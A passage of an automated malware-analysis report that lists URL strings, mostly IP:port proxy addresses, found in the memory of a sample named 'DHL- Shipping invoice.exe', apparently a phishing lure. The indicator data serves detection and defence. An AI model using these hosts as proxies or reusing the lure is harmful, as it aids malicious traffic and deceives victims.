                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.153.130.8:8000
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.153.130.8:8000://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981605000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.159.150.23:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.159.150.23:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.159.189.244:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.159.189.244:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.164.174.26:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.164.174.26:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.166.26.81:53695
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.166.26.81:53695://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.167.124.234:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.167.124.234:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.170.102.225:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.173.12.141:1994
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.173.12.141:1994://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.174.248.19:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.174.248.19:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.174.57.34:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.174.57.34:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.174.87.18:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.174.87.18:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.176.95.38:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.176.95.38:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.176.95.38:999H
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.178.133.73:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98171F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.179.203.83:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.179.231.210:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.179.231.210:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.184.128.45:8181
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.184.128.45:8181://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.185.163.111:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.185.163.111:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.188.164.3:1994
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.188.164.3:1994://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.189.118.232:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.189.118.232:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.190.52.24:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.190.52.24:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.191.75.186:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.191.75.186:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.200.59.6:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.200.59.6:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.225.184.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.225.184.177:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.225.184.206:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.225.184.206:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.225.207.186:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.225.207.186:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.228.147.209:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.228.147.209:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.228.77.131:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.228.77.131:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.229.34.174:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.229.34.174:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.230.48.131:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.230.48.131:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.230.49.2:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.230.49.2:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.231.133.51
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.231.133.51://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.231.133.51:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.231.170.137:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.231.170.137:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.231.221.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.231.221.193:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.231.221.193:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.233.169.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.233.169.40:9994
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.233.169.40:9994://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.233.67.226:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.233.67.226:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.234.61.4:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.234.61.4:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.235.123.45:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.235.87.66:49997
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.235.87.66:49997://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.236.106.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.236.106.245:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.236.106.245:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.238.12.4:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.238.12.4:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.238.57.1:3629
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.238.57.1:3629://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.239.30.1:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.239.30.1:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980438000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9802FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.240.182.120:1981
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.240.182.120:1981://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.248.66.55:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.248.66.55:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.249.48.201:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.249.48.201:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.6.224.254:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.6.224.254:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.6.95.69:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.6.95.69:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.61.187.67:4009
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.61.187.67:4009://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.63.6
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98344F000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.63.64.66:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.63.64.66:1080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.67.210.47:3389
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.67.210.47:3389://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.70.206.33:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.70.206.33:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.70.221.22:18080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.71.15.136:9292
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.71.15.136:9292://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.71.15.136:9292p
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.77.77.144:11304://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.79.230.2
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.79.230.234:443
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.79.230.234:443://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.8.21.43:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.8.21.43:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.1
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:14669
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:14669://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:34447
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:34447://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:47056://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:4715
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:4715://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:48085
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:48085://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:61553
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:61553://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.92.108.112
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.92.108.112://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.92.108.112:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.10.229.243:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.10.229.243:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.160.223
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.160.223://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.160.223:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.19.131
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.19.131://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.19.131:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.223.220:3124
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.223.220:3124://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.148.163.119:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.17.63.166:10000
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.17.63.166:4154
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.17.63.166:4154://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.209.207.150:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.209.207.150:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.209.54.1
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.209.54.102:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.209.54.102:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.209.54.102:8080P
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.219.8.201:41890
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.219.8.201:41890://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.219.80.142:45237
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.219.80.142:45237://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.227.37.185:1088
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.227.37.185:1088://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.227.37.2
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.227.37.21:1088
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.227.37.21:1088://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.227.37.49:1088
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.227.37.49:1088://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.231.72.35:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980C5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.231.72.35:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.241.57.29:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.250.241.181:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.250.241.181:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.250.25.225:53281
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.250.25.225:53281://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.253.143.144:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.253.143.144:1080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.253.143.144:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.253.143.144:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.35.9.110
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.35.9.110://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.35.9.110:80
